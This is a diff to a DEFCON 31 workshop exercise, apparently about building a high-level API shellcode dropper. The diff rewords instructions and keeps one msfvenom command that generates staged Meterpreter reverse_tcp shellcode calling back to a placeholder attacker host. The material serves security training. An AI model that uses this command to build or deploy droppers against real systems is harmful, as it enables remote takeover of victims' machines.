VirtualAlllocEx/DEFCON-31-Syscalls-Workshop/Exercise 3 High_Level_API_Dropper/Exercise 3 High_Level_API_Dropper.md

 ## Meterpreter Shellcode
-In this step, we will create our shellcode for the high-level API dropper poc with msfvenom in Kali Linux.
-To do this, we use the following command and create x64 staged meterpreter shellcode.
+In this step, we will create our meterpreter shellcode for the HLA dropper poc with msfvenom in Kali Linux.
+To do this, we will use the following command and create x64 staged meterpreter shellcode.
 ```
 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt
 ```